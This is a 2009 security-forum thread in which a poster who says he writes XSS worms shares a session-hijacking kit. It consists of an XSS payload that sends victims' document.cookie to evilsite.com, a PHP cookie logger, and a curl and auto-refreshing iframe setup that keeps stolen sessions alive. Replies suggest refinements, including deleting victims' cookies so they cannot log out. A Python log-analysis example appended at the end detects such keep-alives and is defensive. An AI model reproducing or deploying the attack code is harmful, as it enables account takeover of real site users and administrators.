Sla.ckers.org
Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.
Keeping sessions alive php script
Posted by: PaPPy
Date: July 15, 2009 02:14PM

Every time I write a worm, what typically happens is that while I am asleep an admin or some power user visits it, and their session dies by the time I see it in my cookie log. So I want to write a cookie logger that keeps the session alive.

I haven't tested this completely, but feel free to pick it apart.

It comes in 3 files (yes, this seems very insecure, but as you are the only one using it and the victims only see a blank white page that their details are sent to, it's not that bad).

first file is what you include in your <script>document.write("<img src=http://evilsite.com/save.php?c=" + document.cookie + ">");</script>


It takes the user's cookie and searches to see if the session is already being kept alive; if not, it adds it to the auto-refreshing html file.
save.php
<?php
function rstrstr($haystack, $needle) 
{ 
    return substr(strrev(strstr(strrev($haystack), strrev($needle))), 0, -strlen($needle)); 
}


$filename = "sessions.html";
$handle = fopen($filename, "a+");
$contents = fread($handle, filesize($filename));

//change these to something match the session value, or something that is unique to the session
$stringstart="PHPSESSID=";
$stringend=";";

$c = $_GET['c'];

$found = preg_match("/$stringstart(.*?)$stringend/", $c, $matches);

$uniquevalue = $matches[1];
//gives us the value of PHPSESSID 

//search thru the file and see it exists
$doesvalueexistinfile = rstrstr($contents, $uniquevalue);

if(empty($doesvalueexistinfile)){
//the session is not alive so lets add it to the text file
$cc = urlencode($c);
$text = "<iframe src=\"curl.php?c=$cc\" width=100 height=100 frameborder=0></iframe>\n";
fwrite($fp, $text);
}

fclose($handle);
?>

next is a simple curl script that takes the cookie variables and uses them to fetch a page, this page is launched from the iframes
curl.php
<?php

$c = curl_init('http://site.com/news.php');
$vars = urldecode($_GET['c']);

curl_setopt ($c, CURLOPT_COOKIE, $vars);
curl_setopt ($c, CURLOPT_RETURNTRANSFER, true);
$page = curl_exec ($c);
curl_close ($c);

echo $page; //remove to speed things up
?>

and last is the page you leave open on your browser, that keeps refreshing the iframes of the curl.php page

sessions.html
<html>
<head>
<script language="JavaScript">
function startTimer() {
setInterval(onTick,60000); // every minute change as you see fit
}
function onTick() {
document.location.reload();
}
</script>
</head>
<body onLoad="startTimer();">
<iframe src="curl.php?c=PHPSESSID%3Da245345345345%3B%20name%3DEXAMPLE%3B" width=100 height=100 frameborder=0></iframe>

I'm sure there is probably an easier way to do this, but this is the best I came up with while on the shitter.

Any improvements, feel free to add, thanks.

http://www.xssed.com/archive/author=PaPPy/

Re: Keeping sessions alive php script
Posted by: tx
Date: July 15, 2009 08:05PM

It seems most likely to me that the sessions are expired because the user is logging out. Refreshing an iframe in that case seems both useless and noisy. In cases where the session is expiring 'naturally' (i.e. not because of any user action), wouldn't it be better to bypass the iframe and instead just use a small php script and tie it to a cronjob so that it regularly parses your list of sessions and makes a request including the relevant cookies to the server?

Admittedly, this approach would fail for any application that ties session id to ip address (etc.), but then again, the session id isn't really valuable in that case anyway.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 07/15/2009 08:07PM by tx.

Re: Keeping sessions alive php script
Posted by: PaPPy
Date: July 15, 2009 10:48PM

The server I use can't handle crons,
and the sites I'm typically worming don't have IP address checks or any session hijacking protection.

http://www.xssed.com/archive/author=PaPPy/

Re: Keeping sessions alive php script
Posted by: kuza55
Date: July 16, 2009 08:17AM

tx Wrote:
-------------------------------------------------------
> It seems most likely to me that the sessions are
> expired because the user is logging out.

If you're not particularly worried about stealth, just delete the cookies from the user's browser so that they can't log the session out.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]
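
Seen from the server side, the keep-alive discussed in this thread leaves two traces: the session ID tx mentions arriving from a second client address, and requests repeating at the fixed one-minute interval of the refresh page. The following is an added example, not part of any post in the thread, that flags both in access-log records; the log format, session IDs, addresses and thresholds are constructed assumptions.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample, assumed format: "<ISO time> <client ip> <session id> <path>".
SAMPLE_LOG = """\
2009-07-15T14:00:05 198.51.100.7 a245 /index.php
2009-07-15T14:10:00 203.0.113.9 a245 /news.php
2009-07-15T14:11:00 203.0.113.9 a245 /news.php
2009-07-15T14:12:01 203.0.113.9 a245 /news.php
2009-07-15T14:13:00 203.0.113.9 a245 /news.php
2009-07-15T14:13:30 192.0.2.44 b777 /index.php
2009-07-15T14:15:02 192.0.2.44 b777 /news.php
"""
LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

def parse(log):
    """Group requests as {session id: {client ip: [request times]}}."""
    sessions = defaultdict(lambda: defaultdict(list))
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if m:  # malformed lines are skipped rather than aborting the run
            ts, ip, sid, _path = m.groups()
            sessions[sid][ip].append(datetime.fromisoformat(ts))
    return sessions

def is_metronomic(times, min_hits=4, max_jitter=2.0):
    """True when one client's requests are spaced at a near-constant interval."""
    if len(times) < min_hits:
        return False
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return statistics.pstdev(gaps) <= max_jitter

def suspicious_sessions(log):
    """Return {session id: [reasons]} for sessions worth invalidating."""
    findings = {}
    for sid, by_ip in parse(log).items():
        reasons = []
        if len(by_ip) > 1:  # session cookie presented by a second address
            reasons.append("multiple-client-ips")
        if any(is_metronomic(t) for t in by_ip.values()):
            reasons.append("fixed-interval-requests")
        if reasons:
            findings[sid] = reasons
    return findings

if __name__ == "__main__":
    print(suspicious_sessions(SAMPLE_LOG))
```

A session flagged for either reason can be invalidated server-side, and an absolute session lifetime caps how long any keep-alive can extend a session regardless of activity.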
